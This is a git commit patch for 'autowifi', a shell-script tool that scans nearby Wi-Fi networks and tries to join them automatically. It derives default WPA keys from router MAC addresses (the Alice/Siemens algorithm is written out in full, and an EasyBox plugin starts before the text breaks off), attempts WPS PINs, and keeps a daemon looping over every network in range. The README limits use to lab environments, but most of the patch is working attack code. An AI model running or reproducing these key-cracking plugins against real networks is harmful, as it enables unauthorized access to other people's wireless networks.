From dbaee4aae713410b813f871bb8e8594a9d84f814 Mon Sep 17 00:00:00 2001 From: makefu Date: Sat, 20 Dec 2014 22:08:23 +0100 Subject: autowifi-merged files to recon/autowifi --- README.md | 49 ------ TODO | 9 -- recon/autowifi/.gitignore | 1 + recon/autowifi/README.md | 49 ++++++ recon/autowifi/TODO | 9 ++ recon/autowifi/usr/bin/autowifi | 177 +++++++++++++++++++++ recon/autowifi/usr/bin/autowifi_old | 65 ++++++++ recon/autowifi/usr/bin/inspector_wifi | 75 +++++++++ recon/autowifi/usr/bin/iwlist_env | 33 ++++ recon/autowifi/usr/lib/autowifi/lib/core | 20 +++ recon/autowifi/usr/lib/autowifi/lib/iwlist | 55 +++++++ recon/autowifi/usr/lib/autowifi/lib/network | 40 +++++ recon/autowifi/usr/lib/autowifi/lib/openwrt | 18 +++ recon/autowifi/usr/lib/autowifi/lib/plugin_core | 41 +++++ recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant | 59 +++++++ recon/autowifi/usr/lib/autowifi/lib/wps | 84 ++++++++++ recon/autowifi/usr/lib/autowifi/opt/udhcpc.run | 70 ++++++++ recon/autowifi/usr/lib/autowifi/plugins/00profile | 11 ++ recon/autowifi/usr/lib/autowifi/plugins/01open | 6 + recon/autowifi/usr/lib/autowifi/plugins/02alice | 20 +++ recon/autowifi/usr/lib/autowifi/plugins/02easybox | 37 +++++ recon/autowifi/usr/lib/autowifi/plugins/02tplink | 17 ++ .../autowifi/usr/lib/autowifi/plugins/11belkin_wps | 40 +++++ .../usr/lib/autowifi/plugins/30default_wps | 18 +++ usr/bin/autowifi | 177 --------------------- usr/bin/autowifi_old | 65 -------- usr/bin/inspector_wifi | 75 --------- usr/bin/iwlist_env | 33 ---- usr/lib/autowifi/lib/core | 20 --- usr/lib/autowifi/lib/iwlist | 55 ------- usr/lib/autowifi/lib/network | 40 ----- usr/lib/autowifi/lib/openwrt | 18 --- usr/lib/autowifi/lib/plugin_core | 41 ----- usr/lib/autowifi/lib/wpa_supplicant | 59 ------- usr/lib/autowifi/lib/wps | 84 ---------- usr/lib/autowifi/opt/udhcpc.run | 70 -------- usr/lib/autowifi/plugins/00profile | 11 -- usr/lib/autowifi/plugins/01open | 6 - usr/lib/autowifi/plugins/02alice | 20 --- usr/lib/autowifi/plugins/02easybox | 37 ----- usr/lib/autowifi/plugins/02tplink | 17 -- usr/lib/autowifi/plugins/11belkin_wps | 40 ----- usr/lib/autowifi/plugins/30default_wps | 18 --- 43 files changed, 945 insertions(+), 944 deletions(-) delete mode 100644 README.md delete mode 100644 TODO create mode 100644 recon/autowifi/.gitignore create mode 100644 recon/autowifi/README.md create mode 100644 recon/autowifi/TODO create mode 100755 recon/autowifi/usr/bin/autowifi create mode 100755 recon/autowifi/usr/bin/autowifi_old create mode 100755 recon/autowifi/usr/bin/inspector_wifi create mode 100755 recon/autowifi/usr/bin/iwlist_env create mode 100644 recon/autowifi/usr/lib/autowifi/lib/core create mode 100644 recon/autowifi/usr/lib/autowifi/lib/iwlist create mode 100644 recon/autowifi/usr/lib/autowifi/lib/network create mode 100644 recon/autowifi/usr/lib/autowifi/lib/openwrt create mode 100644 recon/autowifi/usr/lib/autowifi/lib/plugin_core create mode 100644 recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant create mode 100644 recon/autowifi/usr/lib/autowifi/lib/wps create mode 100755 recon/autowifi/usr/lib/autowifi/opt/udhcpc.run create mode 100755 recon/autowifi/usr/lib/autowifi/plugins/00profile create mode 100755 recon/autowifi/usr/lib/autowifi/plugins/01open create mode 100755 recon/autowifi/usr/lib/autowifi/plugins/02alice create mode 100755 recon/autowifi/usr/lib/autowifi/plugins/02easybox create mode 100755 recon/autowifi/usr/lib/autowifi/plugins/02tplink create mode 100755 recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps create mode 100755 recon/autowifi/usr/lib/autowifi/plugins/30default_wps delete mode 100755 usr/bin/autowifi delete mode 100755 usr/bin/autowifi_old delete mode 100755 usr/bin/inspector_wifi delete mode 100755 usr/bin/iwlist_env delete mode 100644 usr/lib/autowifi/lib/core delete mode 100644 usr/lib/autowifi/lib/iwlist delete mode 100644 usr/lib/autowifi/lib/network delete mode 100644 usr/lib/autowifi/lib/openwrt delete mode 100644 usr/lib/autowifi/lib/plugin_core delete mode 100644 usr/lib/autowifi/lib/wpa_supplicant delete mode 100644 usr/lib/autowifi/lib/wps delete mode 100755 usr/lib/autowifi/opt/udhcpc.run delete mode 100755 usr/lib/autowifi/plugins/00profile delete mode 100755 usr/lib/autowifi/plugins/01open delete mode 100755 usr/lib/autowifi/plugins/02alice delete mode 100755 usr/lib/autowifi/plugins/02easybox delete mode 100755 usr/lib/autowifi/plugins/02tplink delete mode 100755 usr/lib/autowifi/plugins/11belkin_wps delete mode 100755 usr/lib/autowifi/plugins/30default_wps diff --git a/README.md b/README.md deleted file mode 100644 index 3e0d8dce..00000000 --- a/README.md +++ /dev/null @@ -1,49 +0,0 @@ -# Autowifi -Author: makefu,lassulus - -Status: Pre-Alpha - it will most likely break if you try to use it - -# Contact - -twitter: @krebsbob ,@makefoo - -IRC: freenode #krebs - -# Goals -Goal of autowifi is to provide a tool which automatically can connect to -networks in an unknown environment. - -This can either be done by connecting to open networks, known networks -(whitelist) or by calculating weak default wpa keys (for example easybox -default passwords). - -# Audience -Due to the current status of the project the target audience are -linux users with technical background . - -# Usage - - # all as root - # try to find networks to connect to around you - usr/bin/autowifi_dryrun quiet - - # start the autowifi daemon which tries to stay in networks all the time - usr/bin/autowifi - -# Plugins -All tests to open up networks are implemented in plugins in - usr/lib/autowifi/plugins - -## Run a single Plugin -This can be used for testing purposes, e.g. test a single plugin against given networks directly - - # try out the easybox keygen - usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) - - #e.g. - usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" - -# Disclaimer -- use at own risk -- only run in lab environment -- you break it, you buy it diff --git a/TODO b/TODO deleted file mode 100644 index ddd59818..00000000 --- a/TODO +++ /dev/null @@ -1,9 +0,0 @@ -more intelligent autoconnect (open first, encrypted second etc.) - perform initial scan on startup of unscanned networks - sort networks by bandwidth and connect -profiles ala netcfg/netctl -better profile hooks - -Implement: - - Droid Default WPA2 Pass for HotSpot: CVE-2013-4622: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4622 - - EasyBox 802/803 default WPS Pin: http://packetstormsecurity.com/files/122698/SA-20130805-0.txt diff --git a/recon/autowifi/.gitignore b/recon/autowifi/.gitignore new file mode 100644 index 00000000..05ba1603 --- /dev/null +++ b/recon/autowifi/.gitignore @@ -0,0 +1 @@ +/etc/autowifi/wifi_keys diff --git a/recon/autowifi/README.md b/recon/autowifi/README.md new file mode 100644 index 00000000..3e0d8dce --- /dev/null +++ b/recon/autowifi/README.md @@ -0,0 +1,49 @@ +# Autowifi +Author: makefu,lassulus + +Status: Pre-Alpha - it will most likely break if you try to use it + +# Contact + +twitter: @krebsbob ,@makefoo + +IRC: freenode #krebs + +# Goals +Goal of autowifi is to provide a tool which automatically can connect to +networks in an unknown environment. + +This can either be done by connecting to open networks, known networks +(whitelist) or by calculating weak default wpa keys (for example easybox +default passwords). + +# Audience +Due to the current status of the project the target audience are +linux users with technical background . + +# Usage + + # all as root + # try to find networks to connect to around you + usr/bin/autowifi_dryrun quiet + + # start the autowifi daemon which tries to stay in networks all the time + usr/bin/autowifi + +# Plugins +All tests to open up networks are implemented in plugins in + usr/lib/autowifi/plugins + +## Run a single Plugin +This can be used for testing purposes, e.g. test a single plugin against given networks directly + + # try out the easybox keygen + usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) + + #e.g. + usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" + +# Disclaimer +- use at own risk +- only run in lab environment +- you break it, you buy it diff --git a/recon/autowifi/TODO b/recon/autowifi/TODO new file mode 100644 index 00000000..ddd59818 --- /dev/null +++ b/recon/autowifi/TODO @@ -0,0 +1,9 @@ +more intelligent autoconnect (open first, encrypted second etc.) + perform initial scan on startup of unscanned networks + sort networks by bandwidth and connect +profiles ala netcfg/netctl +better profile hooks + +Implement: + - Droid Default WPA2 Pass for HotSpot: CVE-2013-4622: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4622 + - EasyBox 802/803 default WPS Pin: http://packetstormsecurity.com/files/122698/SA-20130805-0.txt diff --git a/recon/autowifi/usr/bin/autowifi b/recon/autowifi/usr/bin/autowifi new file mode 100755 index 00000000..6b9a090c --- /dev/null +++ b/recon/autowifi/usr/bin/autowifi @@ -0,0 +1,177 @@ +#!/bin/sh +cd $(dirname $(readlink -f $0)) + + +interface=${interface:-wlan0} +root=${root:-../../} +crackdir=$root/usr/lib/autowifi/plugins +wifi_keys=$root/etc/autowifi/wifi_keys +wifi_log=$root/var/log/autowifi.log +painmode=${painmode:-} + +# exists() run_hooks() +. $root/usr/lib/autowifi/lib/core + + +. $root/usr/lib/autowifi/lib/network + +# start_wpa_supplicant() +. $root/usr/lib/autowifi/lib/wpa_supplicant + + +connect(){ + #mac ssid encryption key + + run_hooks interface pre + run_hooks profile pre + + connect_wifi "$@" + + ip_start dhcp + + if check_gateway && check_internet; then + echo yay internet >&2 + + run_hooks interface post + run_hooks profile post + + write_profile "$@" + return 0 + fi + return 1 +} +write_profile(){ + bandw=$(check_bandwidth) + ( cat $wifi_keys | grep -v '^#' | grep -v "|$1|" ; echo "$2|$1|$bandw|$4" ) | ( echo "#SSID|MAC|BANDWIDTH|KEY";sort )| uniq > "${wifi_keys}2" + mv "${wifi_keys}2" "$wifi_keys" +} + + +find_count_of_ssid(){ + c=0 + for i in `seq 1 $WIFI_COUNT`; do + eval SSID=\${ESSID_${i}} + if [ "$SSID" = "$1" ]; then + c+=1 + echo "$i" + fi + done + if [ $c -eq 0 ];then + exit 1 + fi + exit 0 +} + + +connect_to_network_by_ssid(){ + find_count_of_ssid "$1" | (while read i + do + loop_over_cracks "$i" && exit 0 + done;exit 1) + if [ $? -eq 0 ]; then + exit 0 + fi + echo "no network found :(" + exit 1 +} + +connect_with_pw(){ + find_count_of_ssid "$1" | (while read i + do + KEY="$2" + eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\" + if [ $? -eq 0 ]; then + exit 0 + fi + done;exit 1) +} +wifi_init(){ + wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant + wifi_scan > /tmp/${interface}.scan + . /tmp/${interface}.scan +} +loop_over_networks(){ + + wifi_init + for i in `seq 1 $WIFI_COUNT`; do + loop_over_cracks "$i" + if [ $? -eq 0 ]; then + return 0 + fi + done +} + +loop_over_cracks(){ + i=$1 + KEY='' + for crack in $(find $crackdir -type f | sort -u); do + KEY="$(eval root=$root painmode=$painmode \$crack \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${FREQ_${i}} \${ENCRYPTION_${i}})" + if [ $? -eq 0 ]; then + eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\" + if [ $? -eq 0 ]; then + return 0 + fi + fi + done + return 1 +} +loop_cracks_over_networks(){ + wifi_init + for crack in $(find $crackdir -type f | sort -u); do + for i in `seq 1 $WIFI_COUNT`; do + KEY="$(eval root=$root \$crack \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${FREQ_${i}} \${ENCRYPTION_${i}})" + if [ $? -eq 0 ]; then + eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\" + if [ $? -eq 0 ]; then + return 0 + fi + fi + done + done + +} + +#scan_all(){ +# for i in `seq 1 $WIFI_COUNT`; do +# loop_over_cracks $i +# done +#} +# +#scan_unscanned(){ +# find_unscanned_networks | (while read i +# do +# loop_over_cracks $i +# done) +#} + +#find_unscanned_networks(){ +# #TODO broken +# for i in `seq 1 $WIFI_COUNT`; do +# eval SSID=\${ESSID_${i}} +# eval MAC=\${MAC_${i}} +# cat $wifi_stats 2>/dev/null | (while IFS='|' read SSID MAC BANDW KEY; do +# if [ "$1" = "$SSID" -a "$2" = "$MAC" ]; then +# continue +# fi +# done; echo $i) +# done +# exit 0 +#} + +wifi_init +if [ -n "$2" ]; then + echo connecting to $1 with pw $2 + connect_with_pw "$1" "$2" +elif [ -n "$1" ]; then + echo connecting to $1 + connect_to_network_by_ssid "$1" +else + echo looping network now + check_internet || loop_cracks_over_networks + + while sleep 10; do + if ! check_gateway; then + loop_cracks_over_networks + fi + done +fi diff --git a/recon/autowifi/usr/bin/autowifi_old b/recon/autowifi/usr/bin/autowifi_old new file mode 100755 index 00000000..55eaefcd --- /dev/null +++ b/recon/autowifi/usr/bin/autowifi_old @@ -0,0 +1,65 @@ +#!/bin/sh -x +# States (LED): +# Blinking - running wifi plugins +# Turned off - connected to wifi +# Turned on - waiting for next scan round + +wifi=wlan0 +iface=@wifi-iface[0] +radio=$(uci get wireless.${iface}.device) + +# for connect_wifi +. /usr/lib/autowifi/lib/openwrt + +# for iwlist_scan +. /usr/lib/autowifi/lib/iwlist + +# for check_internet and check_gateway +. /usr/lib/autowifi/lib/network + +crack_wifi(){ + #SSID MAC CHANNEL ENCRYPTION WPA WPA2 + all_led timer + if [ "$4" == off ];then + encr=open + elif [ "$6" -eq 1 ]; then + encr=psk2 + elif [ "$5" -eq 1 ]; then + encr=psk + elif [ "$4" == on ]; then + encr=wep + fi + for hack in $(find /usr/lib/autowifi/plugins -type f); do + key=$($hack "$@"); + ret=$? + if [ $ret -eq 0 ];then + connect_wifi "$3" "$1" $encr "$key" + sleep 20 + if check_gateway; then + (cat /etc/autowifi/wifi_keys | grep -v "$1|$2|" ; echo "$1|$2|$key" ) | sort | uniq > /etc/autowifi/wifi_keys2 + mv /etc/autowifi/wifi_keys2 /etc/autowifi/wifi_keys + echo "yay gateway" + check_internet && all_led none && return 0 + fi + fi + done + return 1 +} +loop_over_networks(){ + . /tmp/${wifi}.scan + for i in `seq 1 $WIFI_COUNT`; do + eval grep -q \${MAC_${i}} /etc/autowifi/blacklist && continue + eval crack_wifi \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}} && break + done +} + +iwlist_scan > /tmp/${wifi}.scan +loop_over_networks + +while sleep 60; do + if ! check_internet; then + all_led on + iwlist_scan > /tmp/${wifi}.scan + loop_over_networks + fi +done diff --git a/recon/autowifi/usr/bin/inspector_wifi b/recon/autowifi/usr/bin/inspector_wifi new file mode 100755 index 00000000..17818b44 --- /dev/null +++ b/recon/autowifi/usr/bin/inspector_wifi @@ -0,0 +1,75 @@ +#!/bin/sh +# Usage; sudo iwlist wlan0 scan | ./inspector_wifi +# +# +set -eu + +cd "$(dirname "$(readlink -f "$0")")" +echo "waiting for iwlist scan data..." >&2 + +crack_wifi(){ + for i in ../lib/autowifi/plugins/*;do + if RET=$(./$i "$@" 2>/dev/null);then + echo "$@ - with crack $i succeeded - Key is $RET" + fi + done +} + +shell_escape(){ + sed 's/./\\&/g' +} +remove_quotes(){ + sed 's/^"\|"$//g' +} + + +iwlist_scan_parser(){ + count=0 + while read line; + do + case "$line" in + + *"Cell "*) + if [ $count -ne 0 ];then + crack_wifi "$ESSID" $MAC $CHANNEL any_encryption + fi + WPA=0 + WPA2=0 + : $((count+=1)) + MAC=${line#*Address: } + ;; + *Channel:*) + CHANNEL=${line#*:} + ;; + *Quality=*) + QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" + ;; + *"Encryption key:"*) + ENCRYPTION=${line#*key:} + ;; + *ESSID:*) + ESSID=$(echo "${line#*ESSID:}" | remove_quotes) + ;; + *"IE: IEEE 802.11i/WPA2"*) + WPA2=1 + ;; + *"IE: WPA Version 1"*) + WPA=1 + ;; + *);; #important, do not delete! + esac + done; + crack_wifi "$ESSID" $MAC $CHANNEL any_encryption + echo WIFI_COUNT=$count +} + +wifi_init(){ + iwlist_scan_parser +} + +loop_networks(){ + for i in `seq 1 $WIFI_COUNT`; do + loop_over_cracks "$i" + done +} +wifi_init diff --git a/recon/autowifi/usr/bin/iwlist_env b/recon/autowifi/usr/bin/iwlist_env new file mode 100755 index 00000000..29112ff3 --- /dev/null +++ b/recon/autowifi/usr/bin/iwlist_env @@ -0,0 +1,33 @@ +#!/bin/sh + +count=0 + +iwlist scan ${1:-} 2>/dev/null | ( while read line; +do + case "$line" in + *"Cell "*) + #echo + : $((count+=1)) + echo MAC_${count}="${line#*Address: }" + ;; + *Channel:*) + echo CHANNEL_${count}="${line#*:}" + ;; + *Quality=*) + echo QUALITY_${count}="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" + ;; + *"Encryption key:"*) + echo ENCRYPTION_${count}="${line#*key:}" + ;; + *ESSID:*) + echo ESSID_${count}="${line#*ESSID:}" + ;; + *"IE: IEEE 802.11i/WPA2"*) + echo WPA2_${count}=1 + ;; + *"IE: WPA Version 1"*) + echo WPA_${count}=1 + ;; + *);; + esac +done; echo WIFI_COUNT=$count) diff --git a/recon/autowifi/usr/lib/autowifi/lib/core b/recon/autowifi/usr/lib/autowifi/lib/core new file mode 100644 index 00000000..80ae75b4 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/core @@ -0,0 +1,20 @@ +#!/bin/sh + +exists() { type "$1" >/dev/null 2>/dev/null; } + +run_hooks(){ + # (interface|profile) (pre|post) + typ=$1 + action=$2 + shift;shift + : ${interface?please provide interface} + if [ "$typ" = "interface" ];then + path=interface/$interface/$action + else + path=profile/$2/$action + fi + for hook in $(find "$root/etc/autowifi/hooks/$path" -type f 2>/dev/null | sort -u ); do + $hook "$@" + done +} + diff --git a/recon/autowifi/usr/lib/autowifi/lib/iwlist b/recon/autowifi/usr/lib/autowifi/lib/iwlist new file mode 100644 index 00000000..a9f77f0c --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/iwlist @@ -0,0 +1,55 @@ +#!/bin/sh + +print_iwlist_env(){ + # takes environment: + # count + # MAC + # CHANNEL + # QUALITY + # ENCRYPTION + # ESSID + # WPA + # WPA2 + for i in ESSID MAC CHANNEL QUALITY ENCRYPTION WPA WPA2;do + eval echo ${i}_${count}=\$${i} + done +} + +iwlist_scan(){ + # usage: iwlist_scan $wifi-itf + ifconfig $wifi up + + count=0 + + iwlist ${1:-} scan 2>/dev/null | ( while read line; + do + case "$line" in + *"Cell "*) + [ $count -eq 0 ] || print_iwlist_env + WPA=0 + WPA2=0 + : $((count+=1)) + MAC="${line#*Address: }" + ;; + *Channel:*) + CHANNEL="${line#*:}" + ;; + *Quality=*) + QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" + ;; + *"Encryption key:"*) + ENCRYPTION="${line#*key:}" + ;; + *ESSID:*) + ESSID="${line#*ESSID:}" + ;; + *"IE: IEEE 802.11i/WPA2"*) + WPA2=1 + ;; + *"IE: WPA Version 1"*) + WPA=1 + ;; + *);; + esac + done; print_iwlist_env ;echo WIFI_COUNT=$count) +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/network b/recon/autowifi/usr/lib/autowifi/lib/network new file mode 100644 index 00000000..a0105120 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/network @@ -0,0 +1,40 @@ +#!/bin/sh + +check_gateway(){ + ping -c 1 -w 5 $(ip route | awk '/default/{print $3}') >/dev/null +} +check_internet(){ + # TODO determine the loader, either wget or curl + secret=$(wget -O- http://krebsco.de/secret 2>/dev/null) + if [ "$secret" == "1337" ]; then + return 0 + else + echo "cannot load secret or secret incorrect" >&2 + return 1 + fi +} + +check_bandwidth(){ + echo $(curl http://www.microsoft.com/africa/4afrika/images/infographic.gif -w "%{speed_download}" -o /dev/null 2>/dev/null | sed 's/\..*//') +} + +ip_start(){ + : ${interface?interface variable not set} ${1?please provide method to start ip} + # usage: method [extra parms] + case "$1" in + dhcp) + if exists dhcpcd; then + dhcpcd -x $interface + dhcpcd -w -A $interface + elif exists dhclient; then + dhclient -x $interface + dhclient $interface + elif exists udhcpc; then + PIDFILE=/var/run/udhcpc-${interface}.pid + [ -e $PIDFILE ] && kill `cat $PIDFILE` ||: + udhcpc -n -p $PIDFILE -i $interface -s \ + "$root/usr/lib/autowifi/opt/udhcpc.run" + fi ;; + *) echo "do not know ip starter $1" >&2;; + esac +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/openwrt b/recon/autowifi/usr/lib/autowifi/lib/openwrt new file mode 100644 index 00000000..3483c1fe --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/openwrt @@ -0,0 +1,18 @@ +#!/bin/sh +connect_wifi(){ + # channel ssid encryption key + uci set wireless.${iface}.mode=sta + + ifconfig $wifi up + uci set wireless.${radio}.channel=$1 + uci set "wireless.${iface}.ssid=$2" + if [ $3 == "none" ] ; then + uci set wireless.${iface}.encryption=none + uci -q delete wireless.${iface}.key + else + uci set "wireless.${iface}.key=$4" + uci set wireless.${iface}.encryption=$3 + fi + uci commit wireless + wifi up +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/plugin_core b/recon/autowifi/usr/lib/autowifi/lib/plugin_core new file mode 100644 index 00000000..e79a3c05 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/plugin_core @@ -0,0 +1,41 @@ +#!/bin/sh +parse_plugin_args(){ + [ $# -ne 4 ] && plugin_usage && exit 1 + # convenience function to put args in ENV variables + ESSID="$1" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} + CHANNEL="$3" + ENC="$4" + if [ ${#MAC} -ne 12 ] ;then + echo "MAC malformed" + exit 1 + fi +} +plugin_usage(){ + cat << EOF +usage: $0 ESSID MAC CHANNEL ENC" + + ESSID - string + MAC - 00:11:22:33:44:55 + CHANNEL - 4 + ENC - wpa +EOF + +} + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} +check_painmode(){ + test -z "${painmode:-}" && echo "painmode required" && exit 1 +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant b/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant new file mode 100644 index 00000000..df9c2155 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant @@ -0,0 +1,59 @@ +#!/bin/sh +start_wpa_supplicant(){ + wpa_conf=${1?please supply wpa_supplicant.conf path} + killall wpa_supplicant + sleep 1 +cat>$wpa_conf</dev/null + sleep 10 + + wpa_cli scan_results 2>/dev/null | egrep "^..:" | sed 's/ / /g' | (while IFS=' ' read MAC FREQ QUALITY ENCRYPTION ESSID + do + : $((count+=1)) + print_wifi_env + + done; echo WIFI_COUNT=$count) +} + +print_wifi_env(){ + # takes environment: + # MAC + # FREQ + # QUALITY + # ENCRYPTION + # ESSID + for i in MAC FREQ QUALITY ENCRYPTION ESSID;do + eval echo ${i}_${count}=\\\"\$"${i}"\\\" + done +} +wpa_supplicant_is_usable(){ + wpa_cli status >/dev/null 2>&1 +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/wps b/recon/autowifi/usr/lib/autowifi/lib/wps new file mode 100644 index 00000000..5e9bbda7 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/wps @@ -0,0 +1,84 @@ +#!/bin/sh +has_wps(){ + # the-wpa_supplicant-encryption-string + echo "$1" | grep -q "\[WPS\]" +} +try_wps_pin(){ + # + # ESSID MAC CHANNEL ENC WPA WPA2 PIN + #set -ef + ESSID="$1" + MAC="$2" + CHANNEL="$3" + + # TODO refactor to use all the encryption + # the wpa_supplicant encryption string + ENC="$4" + + PIN="$5" + + [ "$ENC" == "[ESS]" ] && return 2 + WPA_CONF=/tmp/wpa_trywps.conf + WPA_LOG=/tmp/wpa_trywps.log + rm $WPA_LOG + #mkfifo $WPA_LOG + killall wpa_supplicant 2>/dev/null && sleep 1 + + cat > $WPA_CONF <&1 & + WPA_PID=$! + sleep 2 + if !(sudo wpa_cli wps_reg $MAC $PIN | grep -q OK) ;then + echo "wpa_cli wps_reg failed, bailing out!" + return 1 + fi + + # association failed + # exit 1 ;; + # TODO probably not posix compatible... + timeout(){ + ( timeout=10; + while [ $timeout -gt 0 ]; do + sleep 1; + kill -0 $$ 2> /dev/null || exit 0; + : $((timeout--)); + done ; + echo "TIMEOUT REACHED" ; + kill $$)& + exec $@ + } + + if ( timeout tail -f $WPA_LOG & echo "TAILPID: $!") | while read line ; do + bye(){ + printf "%s:" "$2" >&2 + kill $WPA_PID + kill -HUP $TAILPID + exit $1 + } + # DEBUG + #echo $line >&2 + case "$line" in + TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; + *"WPS-FAIL msg=10 config_error=18"*) bye 1 "wrong pin";; + *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1 "rate limiting";; + #*"Association request to the driver failed") bye 1 "wps not available";; + #*CTRL-EVENT-DISCONNECTED*):;; + *"CTRL-EVENT-DISCONNECTED bssid="*"reason=3 locally_generated=1"*)bye 1 "authentication failed, wps deactivated?";; + "TIMEOUT REACHED")bye 1 "timeout reached";; + *CTRL-EVENT-TERMINATING*) bye 1 "wpa_supplicant died";; + *CTRL-EVENT-CONNECTED*) bye 0 "yay connected";; + esac + done ; then + #echo "Connected!" + sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' "$WPA_CONF" + return 0 + else + #echo "failed!" + return 1 + fi + +} diff --git a/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run b/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run new file mode 100755 index 00000000..2e1b919f --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run @@ -0,0 +1,70 @@ +#!/bin/sh +# shamelessly stolen from http://www.doit.org/udhcpc/S50default + +PATH=/bin:/usr/bin:/sbin:/usr/sbin + +RESOLV_CONF="/etc/resolv.conf" + +update_interface() +{ + [ -n "$broadcast" ] && BROADCAST="broadcast $broadcast" + [ -n "$subnet" ] && NETMASK="netmask $subnet" + ifconfig $interface $ip $BROADCAST $NETMASK +} + +update_routes() +{ + if [ -n "$router" ] + then + echo "deleting routes" + while route del default gw 0.0.0.0 dev $interface + do : + done + + for i in $router + do + route add default gw $i dev $interface + done + fi +} + +update_dns() +{ + echo -n > $RESOLV_CONF + [ -n "$domain" ] && echo domain $domain >> $RESOLV_CONF + for i in $dns + do + echo adding dns $i + echo nameserver $i >> $RESOLV_CONF + done +} + +deconfig() +{ + ifconfig $interface 0.0.0.0 +} + +case "$1" in + bound) + update_interface; + update_routes; + update_dns; + ;; + + renew) + update_interface; + update_routes; + update_dns; + ;; + + deconfig) + deconfig; + ;; + + *) + echo "Usage: $0 {bound|renew|deconfig}" + exit 1 + ;; +esac + +exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/00profile b/recon/autowifi/usr/lib/autowifi/plugins/00profile new file mode 100755 index 00000000..d7fb9c75 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/00profile @@ -0,0 +1,11 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 +# ENV: +# root (default: /) +root=${root:-/} +cat $root/etc/autowifi/wifi_keys 2>/dev/null | (while IFS='|' read SSID MAC BANDWIDTH KEY; do + if [ "$1" == "$SSID" -a "$2" == "$MAC" ]; then + echo $KEY + exit 0 + fi +done; exit 1) diff --git a/recon/autowifi/usr/lib/autowifi/plugins/01open b/recon/autowifi/usr/lib/autowifi/plugins/01open new file mode 100755 index 00000000..881f47ea --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/01open @@ -0,0 +1,6 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION +if [ "$4" == "[ESS]" ]; then + exit 0 +fi +exit 1 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02alice b/recon/autowifi/usr/lib/autowifi/plugins/02alice new file mode 100755 index 00000000..1b4533a4 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02easybox b/recon/autowifi/usr/lib/autowifi/plugins/02easybox new file mode 100755 index 00000000..3d7cb8c1 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/02easybox @@ -0,0 +1,37 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core +parse_plugin_args "$@" + +if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then + echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" + exit 1 +else + + # Fill 